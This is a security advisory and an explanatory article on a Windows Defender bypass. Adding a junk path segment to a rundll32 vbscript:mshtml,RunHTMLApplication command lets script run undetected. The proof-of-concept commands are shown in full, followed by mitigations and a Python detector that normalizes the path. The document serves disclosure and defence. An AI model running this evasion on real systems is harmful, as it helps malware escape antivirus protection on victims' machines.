Microsoft Windows Defender - VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript; this example leverages VBScript and the ActiveX engine.
Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with
an "Access is denied" message.
Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.
However, you can add arbitrary text as the 2nd mshtml parameter, building off my previous javascript-based bypasses, to skirt Defender detection.
For example, adding "shtml", "Lol" or other text, and it will execute as of the time of this writing.
E.g.
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
[Exploit/POC]
Open command prompt as Administrator
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
We win!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx Microsoft Windows Defender VBScript Detection Bypass: Exploiting Rundll32 for TrojanWin32/Powessere.G Evasion
Recent research by cybersecurity expert John Page (aka hyp3rlinx) has uncovered a novel bypass technique that circumvents Microsoft Windows Defender's detection mechanisms for the TrojanWin32/Powessere.G malware family. This vulnerability leverages the rundll32.exe binary — a legitimate Windows utility — in combination with VBScript and the ActiveX engine to execute arbitrary commands, such as launching calc.exe, while evading antivirus detection.
Understanding the TrojanWin32/Powessere.G Threat
Originally identified as POWERLIKS, TrojanWin32/Powessere.G is a sophisticated trojan designed to execute remote commands via the rundll32.exe interface. It exploits the system's trust in legitimate binaries to execute malicious payloads. Windows Defender typically blocks such attempts with an Access is denied error, preventing execution.
However, hyp3rlinx discovered that subtle modifications to the path structure within the rundll32 command can bypass these detection rules. This technique builds on prior work where JavaScript-based payloads were used to evade detection — now extended to VBScript, demonstrating that the defense mechanisms are not robust against all scripting languages.
Exploitation Mechanism: Path Obfuscation via MSHTML
The core of the bypass lies in manipulating the mshtml path within the rundll32 command. The original command structure is:
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
When executed, Windows Defender blocks this attempt, displaying:
Access is denied.
Yet, by introducing arbitrary text in the path — such as LoL or PWN — the detection logic fails to trigger. The modified command becomes:
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Result: Calc.exe launches successfully — demonstrating a full bypass of Windows Defender.
Why This Works: Detection Logic Flaws
Windows Defender employs heuristic and pattern-based detection to identify known malicious patterns. In this case, it likely scans for the mshtml path structure in rundll32 commands. However, the presence of non-standard path segments — such as LoL — breaks the expected pattern, causing the detection engine to misclassify the payload as benign.
This highlights a critical flaw: defensive systems are often based on static signatures or path patterns, which can be easily circumvented through obfuscation. The system does not analyze the actual script content or intent — only the path structure.
Real-World Use Case: Malicious Payload Execution
Attackers can use this bypass to execute arbitrary commands without triggering alerts. For example:
- Launching cmd.exe for command-line access.
- Downloading additional payloads from remote servers.
- Disabling security features via Wscript.Shell calls.
As demonstrated in the proof-of-concept (POC), the String(CreateObject("Wscript.Shell").Run("calc.exe"),0) portion is fully functional, proving that VBScript execution is not blocked when the path is altered.
Technical Deep Dive: Rundll32 and ActiveX
rundll32.exe is a Windows utility designed to load and execute DLL functions. It can be used to invoke RunHTMLApplication from the mshtml.dll library, which is part of the Internet Explorer HTML rendering engine.
When the vbscript: protocol is used, the system activates the VBScript engine and the ActiveX runtime. This allows execution of scripts that interact with the Windows environment via objects like Wscript.Shell.
Security analysts note that this technique exploits a trusted system component — rundll32 — to perform malicious actions, making it a classic example of Living-off-the-Land (LOL) tactics.
MITRE ATT&CK Mapping
This technique maps to the following MITRE ATT&CK framework techniques:
| Technique | Description |
|---|---|
| T1059.001 — Command and Scripting Interpreter | Uses VBScript to execute commands via rundll32. |
| T1566 — Phishing | Can be delivered via phishing emails with malicious scripts. |
| T1071 — Application Layer Protocol | Uses standard protocols (like vbscript:) to evade detection. |
Recommendations and Mitigation
While Microsoft has not assigned a CVE number to this issue, it remains a high-severity vulnerability due to its ease of exploitation and potential for widespread abuse. The following mitigation strategies are recommended:
- Disable or restrict rundll32.exe execution via Group Policy or application control.
- Implement behavioral monitoring that tracks script execution, not just path patterns.
- Enable advanced threat detection in Windows Defender, including real-time script analysis.
- Update security baselines to include known bypass patterns (e.g., LoL, PWN).
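As an added detection example (not code from the advisory or the article, and not Defender's own logic), covering both the "Why This Works" analysis and the behavioral-monitoring recommendation: a Python classifier that resolves the `\..\` traversal in a rundll32 `vbscript:`/`javascript:` invocation before matching, so the LoL and PWN variants reduce to the same `mshtml,RunHTMLApplication` as the blocked form. The sample command lines are constructed from the advisory's own examples plus one benign rundll32 call; the regex and field names are this example's assumptions.

```python
import re

# Constructed sample command lines (not real telemetry): the form Defender blocks,
# two of the advisory's bypass variants, and a benign rundll32 invocation.
SAMPLE_CMDLINES = [
    r'rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    r'rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    r'rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    r'rundll32.exe user32.dll,LockWorkStation',
]

# rundll32[.exe] <vbscript|javascript>:<dll spec>,<entry point>; the DLL spec may be
# quoted and padded with "\..\" traversal, which is what a raw path signature misses.
RUNDLL32_SCRIPT_RE = re.compile(
    r'^\s*(?:"?[^"\s]*\\)?rundll32(?:\.exe)?"?\s+'
    r'(?P<proto>vbscript|javascript):(?P<dll>"?[^,]*?)"?,(?P<entry>\w+)',
    re.IGNORECASE,
)

def normalize_module(dll_spec: str) -> str:
    """Resolve traversal so '\\..\\mshtml\\..\\LoL\\..\\mshtml' becomes 'mshtml'."""
    parts = []
    for seg in dll_spec.strip('"').replace('/', '\\').split('\\'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if parts:
                parts.pop()      # climb one level; extra '..' at the root is ignored
            continue
        parts.append(seg)
    name = parts[-1].lower() if parts else ''
    return name[:-4] if name.endswith('.dll') else name

def classify(cmdline: str) -> dict:
    """Verdict for one process command line, keyed on the resolved module, not the raw path."""
    m = RUNDLL32_SCRIPT_RE.match(cmdline)
    if not m:
        return {'suspicious': False, 'module': '', 'reasons': []}
    reasons = [f"rundll32 invoked with the {m['proto'].lower()}: protocol"]
    module = normalize_module(m['dll'])
    if module == 'mshtml' and m['entry'].lower() == 'runhtmlapplication':
        reasons.append('resolves to mshtml,RunHTMLApplication after path normalization')
    if '\\..\\' in m['dll'] or '/../' in m['dll']:
        reasons.append('DLL spec contains directory traversal')
    return {'suspicious': True, 'module': module, 'reasons': reasons}

def scan(cmdlines):
    """Return (cmdline, verdict) for every suspicious entry in a batch of command lines."""
    verdicts = [(c, classify(c)) for c in cmdlines]
    return [(c, v) for c, v in verdicts if v['suspicious']]
```

Because the verdict is keyed on the normalized module and entry point, adding new junk segments to a baseline (as the last recommendation suggests) becomes unnecessary: any traversal chain that resolves to mshtml,RunHTMLApplication is flagged the same way.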
Disclosure Timeline and Responsibility
As per the advisory:
- Vendor Notification: February 18, 2024
- Public Disclosure: February 18, 2024
Authors emphasize that the information is provided "as-is" without warranty. Redistribution is permitted with proper credit to hyp3rlinx and ApparitionSec. The advisory is intended for educational and defensive purposes only.
Conclusion: A Persistent Security Challenge
This bypass demonstrates that even well-established antivirus systems like Windows Defender can be evaded through simple path obfuscation. It underscores the need for dynamic, context-aware detection rather than static pattern matching.
As attackers continue to refine their techniques using trusted binaries and scripting engines, defenders must shift toward behavioral analytics and zero-trust principles. The rundll32 command remains a powerful tool — but one that must be monitored closely.